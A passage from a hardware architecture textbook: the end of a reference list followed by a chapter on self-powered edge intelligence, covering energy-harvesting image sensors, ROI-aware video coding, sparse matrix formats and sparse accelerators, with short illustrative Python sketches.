Badeau RW, Bahar R, Bernstein D, Biro L, Bowhill W, Brown J et al (1992) A 100-MHz
macropipelined VAX microprocessor. IEEE J Solid-State Circuits:1585–1598
Bredlau C, Deremer D (2001) Assembly language through the Java virtual machine. In: Proceed-
ings of the Thirty-Second SIGCSE Technical Symposium on Computer Science Education, pp
194–198
Burroughs Corporation (1972) Burroughs B-1700 software operational guide
Dalakoti V, Chakraborty D (2022) Apple M1 chip vs Intel (X86). EPRA Int J Res Dev:207–211
Dennard RH, Gaensslen FH, Yu H-N, Rideout VL, Bassous E, LeBlanc AR (1974) Design of ion-
implanted MOSFET’s with very small physical dimensions. IEEE J Solid State Circuits:256–
268
DeWitt DJ, Schlansker MS, Atkins DE (1973) A microprogramming language for the Burroughs
B1726. In: Workshop of microprogramming, pp 21–29
Semiconductor Engineering (1991) Makimoto's wave. Retrieved from https://semiengineering.com/knowledge_centers/standards-laws/laws/makimotos-wave/
Espasa R, Valero M, Smith JE (1998) Vector architectures: past, present, and future. In: ICS. ACM,
pp 13–17
Fisher JA (1981) Trace scheduling: a technique for global microcode compaction. IEEE Trans
Comput:478–490
Fisher JA (1983) Very long instruction word architectures and the ELI-512. In: 10th Annual
International Symposium on Computer Architecture, pp 140–150
Flynn MJ (1972) Some computer organizations and their effectiveness. IEEE Trans Comput:948–
960
Foster CC, Riseman EM (1972) Percolation of code to enhance parallel dispatching and execution.
IEEE Trans Comput 21(12):1411–1415
Furber SB (2000) ARM system-on-chip architecture. Pearson Education
Garner RB (1988) The scalable processor architecture (SPARC). In: COMPCON Spring 88 Thirty-
Third IEEE Computer Society International Conference. IEEE, pp 3–31
Gustafson JL (1988) Reevaluating Amdahl’s law. Commun ACM:532–533
Hennessy JL, Patterson DA (2007) Computer architecture: a quantitative approach. Morgan Kaufmann
Hennessy J, Jouppi N, Przybylski S, Rowen C, Gross T, Baskett F, Gill J (1982) MIPS: a
microprocessor architecture. ACM SIGMICRO Newsl:17–22
Hill MD, Marty MR (2008) Amdahl’s law in the multicore era. Computers:33–38
Hookway RJ, Herdeg MA (1997) Digital FX! 32: combining emulation and binary translation.
Digit Tech J:3–12
Hwu W-MW, Kirk DB, Hajj IE (2022) Programming massively parallel processors – a hands-on
approach. Elsevier
Cutress I, Frumusanu A (2021) Instruction sets: Alder Lake dumps AVX-512 in a BIG way.
Anandtech. Retrieved from https://www.anandtech.com/show/16881/a-deep-dive-into-intels-
alder-lake-microarchitectures/5
IBM (2021) Using the SIMD libraries. IBM. Retrieved from https://www.ibm.com/docs/en/xl-
fortran-linux/15.1.6?topic=libraries-using-simd
Intel (2017) Intel® MovidiusTM MyriadTM. Retrieved from https://www.movidius.com/myriad2
Intel (2021a) Intel® 64 and IA-32 architectures – software developer’s manual. Retrieved
from https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-
architectures-software-developer-vol-1-manual.pdf
Intel (2021b, May) Intel architecture instruction set extensions and future features programming
reference
Kane G, Heinrich J (1992) MIPS RISC architectures. Prentice-Hall
Karthihaa A, Karthika S, Priyadharshini KM, Sivasankari L, Anand IV, Samuel TA (2021) Design
and implementation of VLIW DSP processors for high ended embedded based systems. In: AIP
Conference Proceedings
Klaiber A (2000) The technology behind Crusoe processors: low-power x86-compatible processors
implemented with Code Morphing software. Transmeta Corp
Lindholm T, Yellin F (1996) The Java virtual machine specification
Macro (1996) Instruction set reference manual. Digital Equipment Corporation
Mantor M (2012) AMD Radeon™ HD 7970 with graphics core next (GCN) architecture. In: IEEE
Hot Chips 24 Symposium (HCS), pp 1–35
McFarling S, Hennessy J (1986) Reducing the cost of branches. ACM SIGARCH Computer
Architecture News:396–403
von Neumann J (1945) First draft of a report on the EDVAC. U.S. Army Ordnance Dept.
and Moore School of Electrical Engineering, University of Pennsylvania
NVIDIA (2007) NVIDIA CUDA compute device architecture – programming guide.
Retrieved from https://developer.download.nvidia.com/compute/cuda/1.0/NVIDIA_CUDA_-
Programming_Guide_1.0.pdf
NVIDIA (2022) PTX ISA. Nvidia. Retrieved from https://docs.nvidia.com/cuda/parallel-thread-
execution/index.html
ONNX (2020) Open Neural Network Exchange Intermediate Representation (ONNX IR) specifi-
cation. Retrieved from https://github.com/onnx/onnx/blob/main/docs/IR.md
Patt Y, Patel S (2003) Introduction to computing systems. McGraw-Hill
Patterson DA, Fehr ES, Séquin CH (1979) Design considerations for the VLSI processor of X-
TREE. In: Proceedings of the 6th Annual Symposium on Computer Architecture, pp 90–101
Peleg A, Weiser U (1996) MMX technology extension to Intel architecture. Micro 16(4):42–50
Pyeatt LD, Ughetta W (2019) ARM 64-bit assembly language. Newnes
Radin G (1983) The 801 minicomputer. IBM J Res Dev 27(3):237–246
Rau BR, Fisher JA (1993) Instruction-level parallel processing: history, overview, and perspective.
J Supercomput 7(1):9–50
RISCV (2021) The RISC-V instruction set manual. Retrieved from https://riscv.org/wp-content/
uploads/2017/05/riscv-spec-v2.2.pdf
Ronen R, Eliahu A, Leitersdorf O, Peled N, Korgaonkar K, Chattopadhyay A et al (2021) The
Bitlet model: A parameterized analytical model to compare PIM and CPU systems. ACM J
Emerg Technol Comput Syst:1–29
Rotem E, Yoaz A, Rappoport L, Robinson SJ, Mandelblat JY, Gihon AE (2022) Intel Alder Lake
CPU architecture. MICRO:13–19
Russell RM (1978) The CRAY-1 computer system. Commun ACM:63–72
Sarda S, Pandey M (2015) LLVM essentials. Packt
Sharangpani H (1999a) Intel® Itanium™ processor microarchitecture overview. Microprocessor
Forum 10(4)
Sharangpani H (1999b) Itanium™ processor microarchitecture overview. Microprocessor Forum
Singh A (1988) The 8088 microprocessor: programming, interfacing, software, hardware, and
applications. Prentice-Hall
Smith JE, Nair R (2005) Virtual machine architectures, implementations and applications. Morgan
Kaufmann Publishers
Solomon B, Mendelson A, Orenstien D, Almog Y, Ronen R (2001) Micro-operation cache: a power
aware frontend for variable instruction length ISA. In: International Symposium on Low Power
Electronics, pp 4–9
Traore M, Langlois JM, David JP (2022) ASIP accelerator for LUT-based neural networks
inference. In: IEEE Interregional NEWCAS Conference (NEWCAS), pp 524–528
Tucker SG (1967) Microprogram control for system/360. IBM Syst J 6(4):222–241
Turing AM (1938) On computable numbers, with an application to the Entscheidungsproblem. A
correction. Proc London Math Soc, pp 544–546
Valiant LG (1990) A bridging model for parallel computation. Commun ACM:103–111
VanRossum G, Drake FL (2010) The python language reference. Python Software Foundation,
Amsterdam
Watson W (1972) The TI ASC: a highly modular and flexible super computer architecture. In: Fall
Joint Computer Conference, pp 221–228
WIKIPEDIA (2022) CUDA. Retrieved from https://en.wikipedia.org/wiki/CUDA
Wilkes M (1951) The best way to design an automatic calculating machine. In: Computer Inaugural
Conference, Manchester.
Zhang Y, Yang W, Li K, Tang D, Li K (2021) Performance analysis and optimization for SpMV
based on aligned storage formats on an ARM processor. J Parallel Distrib Comput:126–137
Architectures for Self-Powered Edge
Intelligence 3
Amit Ranjan Trivedi, Jaeha Kung, and Jong Hwan Ko
Contents
Evolution of Edge Intelligence and a Pathway to Self-Powered Intelligent
Computations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90
Architectures for Energy Harvesting in IoT Edges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92
A Self-Powered Image Sensor System with Autonomous Mode
Management (AMM) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 93
Factors Affecting Self-Power Performance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 94
ROI-Aware Image Processing Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Moving Object Detection Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 96
ROI-Based Coding Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Resource-Aware Control of Target Data Rate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 98
Resource-Aware Control of Encoding Data Rate . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 100
Architectural Support for Handling Sparsity in IoT Devices . . . . . . . . . . . . . . . . . . . . . . . . . . 101
Approaches in Matrix Multiplication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 102
Compressed Sparse Formats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
Recent Hardware Architecture for Handling Sparsity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 104
Architectures for Power-Gating-Based Active Leakage Control . . . . . . . . . . . . . . . . . . . . . . . 111
Overview of Power-Gating . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 111
Challenges and Trade-Offs in Power-Gating . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Power-Gating Efficiency Learner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 115
Self-Adaptive Power-Gating Architecture . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 116
Test Chip and Measurement Results . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Conclusion and Future Roadmap . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
References . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 121
A. R. Trivedi ()
University of Illinois at Chicago, Chicago, IL, USA
e-mail: [email protected]
J. Kung
Daegu Gyeongbuk Institute of Science and Technology (DGIST), Daegu, Republic of Korea
e-mail: [email protected]
J. H. Ko
Sungkyunkwan University (SKKU), Suwon, Republic of Korea
e-mail: [email protected]
Artificial intelligence (AI) and machine learning (ML) algorithms have shown that
growing volume and variety of data, efficient computing and storage resources, and
data-driven learning frameworks can be exploited for highly accurate predictions in
many complex problems such as computer vision and natural language processing.
The first-generation AI/ML algorithms were mostly employed on applications
where prediction accuracy mattered the most, and improving computational effi-
ciency was an afterthought. This has changed in the present applications where
AI/ML platforms must simultaneously meet stringent accuracy, speed, and energy
constraints in intelligence processing. Among the emerging AI/ML applications,
the Internet of Things (IoT) especially offers intriguing prospects. By augmenting
the distributed perception and control of IoTs with the data-driven learning of AI/ML,
intelligent IoT devices can attain heightened awareness and unprecedented control of
their application spaces. For example, in precision agriculture, a distributed camera
network can detect disease onset by classifying crop images as healthy or diseased
to maximize the farm yield. Since network connectivity in remote agriculture fields
can be unpredictable, intelligent IoTs reduce their reliance on the cloud nodes by
possessing on-sensor intelligence. Similarly, IoTs with edge intelligence in a smart
office can personalize workspaces without transmitting personal data to the cloud.
Figure 1 shows the hypothesized evolution stages of edge intelligence, similar
to Zhou et al. (2019), but from a hardware perspective. At the first level of edge
intelligence, the training of intelligence models is performed only in the cloud
nodes, whereas the cloud and edge devices collaborate for inference. In particular,
at this level of edge intelligence, edge devices locally extract and transmit only
the actionable information, thereby reducing the communication bandwidth demanded
between the edge and the cloud.
edge intelligence include keyword spotting in smart home devices such as Google
Home (Google Home) and activity recognition in smart cameras such as Blink
(Amazon Blink). By locally identifying the actionable inputs, a cloud node need
not continuously receive data from the edges, such as from Alexa or Ring, but
it is invoked only when an action may be desired. At the second level of edge
intelligence, even though the training of intelligence models is restricted to the
cloud, edge nodes perform end-to-end inference. Applications at this level include
autonomous navigation of small drones in remote environments of limited cloud
bandwidth (Shukla et al. 2021). End-to-end edge intelligence is needed to
operate on dynamically evolving inputs, where latency in the actions may lead
to fatal consequences such as a drone collision. Since the latency of cloud-based
inference in remote environments may be high due to low bandwidth, or, worse,
unpredictable, end-to-end in situ edge intelligence is necessary. At the
third level of edge intelligence, both training and inference must be performed
locally within the edge device. Although the edge device may inherit a cloud-trained
initial intelligence model, it must update the model locally to adapt to its
application surroundings. Applications at this level include continuous learning or
reinforcement learning in edge devices where the devices continuously update their
intelligence model by interacting with the environment.
Fig. 1 Evolution of edge intelligence. At level 1, edge devices collaborate with cloud for
inference. At level 2, edge devices perform end-to-end inference. At level 3, edge devices perform
both training and inference locally
Fig. 2 A pathway for self-powered edge intelligence. In this chapter, complementary techniques
on energy scavenging, computational energy efficiency, and minimization of energy leakage are
reviewed for pervasive edge intelligence
Despite the intriguing prospects of edge intelligence in IoTs, most edge nodes are
constrained in area and energy, limiting their budget for on-edge intelligence capa-
bilities. Subsequently, emerging architectural techniques are reviewed to address
this challenge from complementary viewpoints (Fig. 2). First, in section “Archi-
tectures for Energy Harvesting in IoT Edges”, architectures to enhance the energy
budget for on-edge intelligence by harvesting energy from the environment are
reviewed. Specifically, techniques that leverage IoT sensors to opportunistically
scavenge energy when the sensor inputs need not be processed are discussed. Sec-
ond, in section “ROI-Aware Image Processing Architecture”, architectures that can
identify and focus upon regions of interest (ROI) are reviewed. By focusing only on
ROIs, the computational efficiency of edge intelligence can improve dramatically. In
section “Architectural Support for Handling Sparsity in IoT Devices”, architectures
that can exploit sparsity in input and parametric models for intelligence processing
are reviewed. Since perception domains and computing models for IoT edge devices
are often sparse, the sparsity-aware computations in this section minimize the
computing and storage resource demand for on-edge intelligence. Readers can
also refer to the chapters in this book on approximate computing and subthreshold
computing, which are complementary to the techniques for enhancing computational
energy efficiency discussed in this chapter. Additionally, since IoT edge nodes
have low activity, in section “Architectures for Power-Gating-Based Active Leakage
Control”, learning-based architectures that learn and adapt to varying application
activities and environmental conditions to minimize power wastage are reviewed.
Synergistic integration of architectural techniques for energy harvesting, efficient
workload processing, and efficient energy resource utilization will lay the founda-
tions of self-sustained edge intelligence for next-generation intelligent IoTs.
Architectures for Energy Harvesting in IoT Edges
In IoT applications, wireless image sensor nodes are generally deployed in areas
where human intervention for battery replacement is a costly operation (Law et al.
2011). Therefore, sensor nodes are expected to operate for an extended period with
limited energy sources. A longer lifetime can be achieved by harvesting ambient
energy from the environment (Cevik et al. 2015). However, energy harvesting generally
requires additional devices (thermoelectric, piezoelectric, photovoltaic, etc.). An
alternative approach to a self-powered sensor node is to use the sensor array
itself as an energy-harvesting device. Since the pixel array is used for sensing only
a limited fraction of the time, it can be configured to harvest energy during idle time
and store the harvested energy in a battery or supercapacitor. While a few studies have
shown the feasibility of using an image pixel array for harvesting (Law et al. 2011;
Kim et al. 2014; Wang and Leon-Salas 2015; Nayar et al. 2015; Chiou and Hsieh
2015), these studies only considered powering a pixel array and its peripherals.
Fig. 3 (a) Die photo of the sensor node, (b) key performance parameters of the system, (c) and a
diagram showing the consumed/harvested energy over time
An AMM unit in the system controls the switching between the sensor's imaging and
harvesting modes and the transitions between the regulator's boost and buck modes.
The mode switching can be externally controlled or autonomously managed based on
the available stored energy. In energy-autonomous imaging mode, the mode-switching
signal is self-generated by the system. The decision is made by sensing the voltage
drop in the energy storage and assessing how much energy is required to process the
next frame. If the energy level in the storage is below that minimum limit, the
system decides to harvest before allowing the next frame to be captured. Thus, in
the self-powered case, the frame rate becomes a system-defined variable and varies
depending on the available energy. In practical operation, the demanded frame rate
can push the system into sensing, but if enough energy is not available, the AMM
will stop sensing and switch to harvesting mode.
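To make the decision logic concrete, the following Python sketch models the AMM policy described above; the per-frame energy, the harvesting rate, and the one-second time step are illustrative assumptions, not values taken from the actual controller.

```python
E_FRAME_UJ = 30.0        # assumed energy to capture and process one frame (uJ)
P_HARVEST_UW = 2.1       # assumed harvested power while in harvesting mode (uW)

def amm_step(stored_uj: float, frame_requested: bool):
    """One 1-s control step: return (mode, updated stored energy in uJ)."""
    if frame_requested and stored_uj >= E_FRAME_UJ:
        return "imaging", stored_uj - E_FRAME_UJ    # enough energy: capture a frame
    return "harvesting", stored_uj + P_HARVEST_UW   # otherwise keep harvesting

energy = 0.0
for t in range(40):
    mode, energy = amm_step(energy, frame_requested=True)
    if mode == "imaging":
        print(f"t={t:2d} s: frame captured, {energy:.1f} uJ left")
```

With these assumed numbers, a frame is captured roughly every 15 s, mirroring the self-powered operating point reported below.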
A test chip is designed in a 0.13 μm CMOS technology node, as depicted in Fig. 3a.
It can process image frames with 128 × 96 pixels at the maximum frame rate
of 230 frames/s. The design demonstrates the peak harvested power of 2.1 µW at
the sensor array’s output. Based on the peak harvested power and the measured
power dissipation of the different components, the sensor can be self-powered
while processing a frame every 15 s (Fig. 3c). The maximum frame rate that can
be supported by energy harvesting is affected by various system factors. The
factors include pipelining architecture, SRAM supply voltage, pixel size, and power
converter efficiency.
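The reported self-powered operating point can be cross-checked with a simple energy-balance bound (the per-frame energy below is inferred from the quoted 2.1 µW and 15 s figures, not an independently reported value):

$$ T_{\text{frame}} \;\ge\; \frac{E_{\text{frame}}}{P_{\text{harvest}}} \;\approx\; \frac{31.5~\mu\text{J}}{2.1~\mu\text{W}} \;=\; 15~\text{s} $$

Any of the system factors listed above that lowers the per-frame energy (or raises the harvested power) directly improves this bound.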
Increasing the unit pixel size improves the energy-harvesting performance. An
increased pixel area is also expected to improve the dynamic range of image sensing.
The major disadvantage of increasing the unit pixel size is the reduced
image resolution per array area. To keep the same number of pixels (resolution),
more sensor array area will be needed. Similarly, to keep the array area the same,
the number of pixels in the array must be reduced. While lower image resolution
results in lower perceptual quality to the users, it has an advantage in system energy
consumption because it reduces the computation energy and transmission energy
per frame, enhancing the self-powered frame rate.
ROI-Aware Image Processing Architecture
Fig. 4 (a) A wireless image sensor platform with a block-wise region-based processing model (b)
proposed bit-truncation method
Moving Object Detection Architecture
When the ROI is defined as a region with moving objects, ROI detection approaches
can be divided into two categories depending on their complexity and robustness:
low-power moving object detection and noise-robust moving object detection.
ROI-Based Coding Architecture
Once the ROI is detected, a video can be processed more efficiently by focusing on
the ROI. ROI-based coding methods can be divided into temporal and spatial methods.
To address these drawbacks, Lai et al. (2004) proposed a multi-rate approach that
transmits non-ROI blocks at a frame rate lower than that of ROI blocks. However,
whenever frames with non-ROI blocks are transmitted, the transmitted volume
increases significantly, requiring a large buffer to accommodate the high
fluctuation in the encoding rate. Moreover, for correct reconstruction of the
image frames without non-ROI blocks, a sensor node needs to transmit block
identifiers that contain the location (or sequence number) of the blocks.
A source rate control scheme that is unaware of the channel condition may result
in significant quality degradation when the channel's data rate is lower than that
of the encoder. To address this problem, Haratcherev et al. proposed cross-layer
signaling, which informs the encoder of the channel data rate so that the encoder
can adjust its data rate as well (a feedback control scheme) (Haratcherev and Taal
2005). However, if the feedback control scheme uses conventional rate-controlled
encoders, it controls the source data rate by changing only the quality of the
entire video, which may result in a low-quality ROI (a content-unaware feedback
control scheme). Although a feedback controller with existing ROI-based processing
approaches (i.e., a content-aware but energy-unaware feedback control scheme) can
optimize the quality of the ROI, it suffers an energy increase when the channel rate
decreases or the signal power increases. Therefore, achieving an optimal system-level
energy-quality trade-off under varying channel conditions requires system-wide
feedback control that adaptively tunes the parameters of both the encoder and the
transmitter.
Such a system-wide feedback control scheme optimizes the system performance in two
ways. First, the controller guarantees bounded transmission energy and quality
distortion over the wireless channel by reducing the source data rate according to
transmission parameters that satisfy the BER target. Second, source rate control
using both the number of MBs to encode and the quality of these MBs further
optimizes the ROI quality and the energy consumption of the computation.
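As a concrete, deliberately simplified illustration of such a controller, the Python sketch below picks a per-frame bit budget from the channel rate and then spends it on ROI macroblocks first; all names, the 30 fps assumption, and the rate table are hypothetical and not taken from the cited designs.

```python
def control_rate(channel_kbps: float, roi_mbs: int, total_mbs: int,
                 bits_per_mb: dict[int, float]) -> tuple[int, int]:
    """Return (number of MBs to encode, quality factor QF).

    bits_per_mb maps a QF to the average encoded MB size at that QF
    (illustrative values); a higher QF means higher quality and more bits.
    """
    budget = channel_kbps * 1000 / 30          # per-frame bit budget at 30 fps
    # Try quality factors from highest to lowest; the ROI must always fit.
    for qf in sorted(bits_per_mb, reverse=True):
        n = int(budget // bits_per_mb[qf])
        if n >= roi_mbs:                       # ROI fits: encode ROI + extra MBs
            return min(n, total_mbs), qf
    # Channel too poor even for the ROI at lowest quality: drop non-ROI entirely.
    return roi_mbs, min(bits_per_mb)

# Example: 96 ROI MBs out of 396, over a 400 kbps channel.
print(control_rate(400, 96, 396, {25: 60.0, 50: 120.0, 75: 240.0}))
```

The sketch captures the two control knobs named above: the number of macroblocks encoded and their quality.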
Fig. 5 ROI-based rate controller design (a) tied to H.264/AVC and (b) based on a simple encoder
(MJPEG). (c) Diagram of the low-power online rate controller
Architectural Support for Handling Sparsity in IoT Devices
For GEMM operations, two input matrices A and B are provided, and the output
matrix Y is generated. In computing the output matrix Y, two approaches can be
used: (i) the inner product approach and (ii) the outer product approach. Each
approach has its advantages and disadvantages; thus, the proper choice depends on
the sparsity level and the on-chip memory size. In the inner product approach,
each output element is computed as a dot product:
$$ y_{ij} = \sum_{k=0}^{K-1} a_{ik} \cdot b_{kj} \qquad (1) $$
Fig. 6 Two approaches for matrix multiplication: (a) inner product approach and (b) outer product
approach
where (i, k), (k, j), and (i, j) are the coordinates of an element in matrices A, B,
and Y, respectively. The required number of multiply-accumulate (MAC) operations for
computing Y is K × N². Note that the addition of the a_{ik} · b_{kj} terms happens
right after each multiplication is performed. Thus, the inner product approach shows
high output reuse (or partial-sum reuse). However, the inner product approach has
low input reuse for one of the two input matrices: e.g., a row vector of A is
stationary in the processing engines, while a column vector of B changes for each
dot product. When the GEMM operation becomes sparse, it becomes a challenge to match
the index of a column in a_i and a row in b_j, i.e., the index k in Eq. (1). In the
outer product approach, Y is instead computed as a sum of rank-1 partial products:
$$ Y = \sum_{k=0}^{K-1} Y_k = \sum_{k=0}^{K-1} a_k \otimes b_k \qquad (2) $$
where k is the index of each partial product, a_k is the kth column vector of A, and
b_k is the kth row vector of B. Unlike the inner product approach, the addition of
partial products occurs after all multiplications are completed. Thus, the outer
product approach shows high input reuse but poor output reuse, as all the Y_k's are
kept in on-chip or off-chip memory for the reduction step. As shown in Fig. 6, to
obtain the same output y_1 as in the inner product approach, the corresponding
entries of the partial-product maps Y_1 and Y_3 must be added together to produce
y_1 = a_0 · b_3 + a_1 · b_4.
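The two dataflows can be summarized in a few lines of Python (a plain reference sketch using NumPy, not any accelerator's dataflow): the inner product variant reduces each output element immediately, while the outer product variant accumulates K rank-1 partial-product maps.

```python
import numpy as np

def gemm_inner(A, B):
    """Inner product dataflow (Eq. 1): each y_ij is a complete dot product,
    so partial sums are reduced immediately (high output reuse)."""
    N, K = A.shape
    M = B.shape[1]
    Y = np.zeros((N, M))
    for i in range(N):
        for j in range(M):
            for k in range(K):                 # index k must match a column of a_i
                Y[i, j] += A[i, k] * B[k, j]   # ... and a row of b_j
    return Y

def gemm_outer(A, B):
    """Outer product dataflow (Eq. 2): K rank-1 partial-product maps Y_k are
    produced first and merged at the end (high input reuse, poor output reuse)."""
    K = A.shape[1]
    Y = np.zeros((A.shape[0], B.shape[1]))
    for k in range(K):
        Y += np.outer(A[:, k], B[k, :])        # Y_k = a_k (outer) b_k
    return Y

A, B = np.random.rand(4, 3), np.random.rand(3, 5)
assert np.allclose(gemm_inner(A, B), gemm_outer(A, B))
```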
Compressed Sparse Formats
As zeroes come to dominate a given matrix, i.e., as the sparsity of the matrix
increases, fetching the entire matrix in the original dense format significantly
reduces the effective memory bandwidth. To fill the memory bandwidth with useful
data, various sparse data formats have been proposed (Bank and Douglas 1993;
Robinson and Cherry 1967; Qin et al. 2020; Kung et al. 2019). The coordinate list format
stores a list of {row, column, value} tuples where the data is typically stored in
row-major order. The size of metadata to locate nonzero values in the coordinate list
format is large as it needs to store both row and column coordinates. To reduce the
metadata size of indexing either rows or columns, compressed sparse row (CSR) or
compressed sparse column (CSC) is used (Eisenstat et al. 1984). In the CSR format,
row extents (row pointers) are stored instead of row coordinates; the difference
between consecutive row pointers gives the number of nonzero values in each row.
The CSC format is similar to the CSR format but instead stores row indices and the
extents of columns (column pointers).
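As a concrete illustration, the following Python sketch encodes a small dense matrix in the CSR format described above (the helper name and layout are illustrative):

```python
import numpy as np

def to_csr(M):
    """Encode a dense matrix as CSR: values, column indices, row pointers."""
    values, col_idx, row_ptr = [], [], [0]
    for row in M:
        for j, v in enumerate(row):
            if v != 0:
                values.append(v)
                col_idx.append(j)
        row_ptr.append(len(values))   # extent of each row, as described above
    return values, col_idx, row_ptr

M = np.array([[5, 0, 0],
              [0, 0, 8],
              [3, 6, 0]])
print(to_csr(M))  # ([5, 8, 3, 6], [0, 2, 0, 1], [0, 1, 2, 4])
```

The CSC encoding is obtained analogously by swapping the roles of rows and columns.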
Fig. 7 The resulting compression ratio using various sparse matrix formats depending on the
sparsity of a 2048 × 2048 weight matrix
There is another set of sparse matrix formats that does not explicitly store the
coordinates of nonzero values. In run-length encoding (RLE), consecutive zeroes
between two nonzero values are clustered together, and the zero count is stored as
an indicator with a predefined bit-width, e.g., 2 bits or 4 bits (Robinson and Cherry
1967). For instance, with a 4-bit run-length code, up to 15 zeroes can be skipped
per decoding cycle. The simplest way of identifying nonzero values is to store a
bitmap that marks nonzero values with 1 (Qin et al. 2020). The size of the bitmap,
however, remains the same even at a high sparsity level. The compression ratio can
be improved by applying Huffman coding to the bitmap, i.e., Huffman-coded
nonzero indication (HNI) (Kung et al. 2019).
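The following Python sketch illustrates the two coordinate-free formats just described, a 4-bit run-length code and a bitmap (a simplified model; for instance, trailing zeroes and the Huffman coding of the bitmap used by HNI are omitted):

```python
def rle4_encode(vec):
    """Run-length code: (zero_run, value) pairs with a 4-bit zero count,
    so at most 15 zeroes are skipped per decoding cycle."""
    out, run = [], 0
    for v in vec:
        if v != 0:
            out.append((run, v))
            run = 0
        else:
            run += 1
            if run == 16:            # 4-bit counter would overflow:
                out.append((15, 0))  # 15 zeroes + this zero stored explicitly
                run = 0
    return out                       # trailing zeroes dropped in this sketch

def bitmap_encode(vec):
    """Bitmap format: mark nonzero positions with 1; store values separately."""
    return [int(v != 0) for v in vec], [v for v in vec if v != 0]

vec = [0, 0, 7, 0, 0, 0, 5]
print(rle4_encode(vec))    # [(2, 7), (3, 5)]
print(bitmap_encode(vec))  # ([0, 0, 1, 0, 0, 0, 1], [7, 5])
```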
The compression ratios achieved by different sparse matrix formats are compared in
Fig. 7. The simulated matrix size is 2048 × 2048 at varying sparsity levels. For the
sparse formats, the data includes the nonzero values as well as the metadata for
their coordinates. It is thus beneficial to use a sparse matrix format when the
matrix density is less than 70%, i.e., at sparsity above 30%. At low sparsity
levels, i.e., sparsity below 50%, using the coordinate list or CSC/CSR format is
still worse than using the dense format. The HNI and bitmap formats show the highest
compression ratios at sparsity from 20% to 50%. When the matrix becomes highly
sparse, i.e., above 80%, the RLE-4 format becomes as efficient as the HNI format.
Note that the HNI format shows the highest compression ratio at all sparsity levels.
Reducing the total data size as much as possible is important, as accessing data in
memory blocks consumes significantly more energy than arithmetic (Horowitz). For
example, accessing 32-bit data from a 32-KB SRAM consumes 50× more energy than
adding two 32-bit integers in 45-nm CMOS technology (Table 2).
Recent Hardware Architecture for Handling Sparsity
Computing with sparse matrices poses a challenge in the design of processing units,
as it introduces irregular data access patterns and index-matching overhead.
Fig. 8 The hardware architecture for SpGEMM operations using the CSC format (Han et al. 2016b).
It uses a leading nonzero detection (LND) unit to skip zeroes in a row vector a of matrix A
Fig. 9 The hardware accelerator for SpGEMM operations with HNI format (Kung et al. 2019).
(a) The overall architecture of sparse processing engine with the hierarchical Huffman LUTs. (b)
The design of a parallel Huffman decoder for real-time decoding. (c) The Huffman tree separated
by multiple levels with depth = 2 and (d) its associated multilevel Huffman LUTs
Depending on the number of nonzero indications (1s) in the decoded symbol, a MAC
unit becomes busy for that number of cycles. With the symbol “10010110,” the
corresponding MAC unit computes for the next four cycles. By using the more
efficient HNI format, the performance improves by 9.48∼27.57% on language modeling
benchmarks compared to hardware using the CSC format (Kung et al. 2019).
Instead of finding the next intersection between two coordinate streams one element
at a time, ExTensor (Hegde et al. 2019) utilizes a tree representation to
efficiently skip ineffectual coordinates.
Fig. 10 (a) The hardware support for the bidirectional skipping mechanism of the optimized
intersect architecture. (b) The scanner design, in which the SkipTo() function is performed,
shown in detail
Fig. 11 The skip operation supported by ExTensor (Hegde et al. 2019). (a) An example of
SkipTo() function calls. (b) The performance improvement by using ExTensor over Intel CPU
with Math Kernel Library (MKL)
The hardware architecture for efficiently finding intersections between two
coordinate streams A and B is shown in Fig. 10a. The scanner iterates over a stream
of coordinates. Note that a high-dimensional tensor consists of many streams, which
are hierarchically intersected. To allow more efficient stream generation, the
SkipTo() function is implemented in a hardware module. The bidirectional skipping
mechanism between scanners A and B allows a multistep jump, as shown in Fig. 11a.
An input coordinate (scoord) from another scanner is compared to “T” consecutive
elements in the FIFO (Fig. 10b). The value “T” determines the efficiency of the
skipping mechanism. The intersect unit simply compares two coordinates from streams
A and B and outputs the coordinate if they are identical, i.e., an intersection hit.
Fig. 12 The hardware architecture for processing irregular SpGEMM operations. (a) The overall
architecture of SIGMA with Benes distribution network (Qin et al. 2020). (b) Forwarding adder
network for the flexible output reduction
Otherwise, the intersect unit pops the smaller element from either FIFO A or B.
Compared to computing SpGEMM on a CPU with MKL support, ExTensor with the skipping
mechanism improves performance by 3.1× on average (Fig. 11b).
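A software analogue of this bidirectional skipping is sketched below in Python; the galloping SkipTo() stands in for the hardware comparison against T consecutive FIFO entries and is an illustrative choice, not ExTensor's exact mechanism.

```python
def intersect(a, b, skip):
    """Intersect two sorted coordinate streams using SkipTo-style jumps
    (as in Fig. 11a) instead of advancing one element at a time."""
    out, i, j = [], 0, 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            out.append(a[i]); i += 1; j += 1   # intersection hit
        elif a[i] < b[j]:
            i = skip(a, i, b[j])               # A.SkipTo(b[j])
        else:
            j = skip(b, j, a[i])               # B.SkipTo(a[i])
    return out

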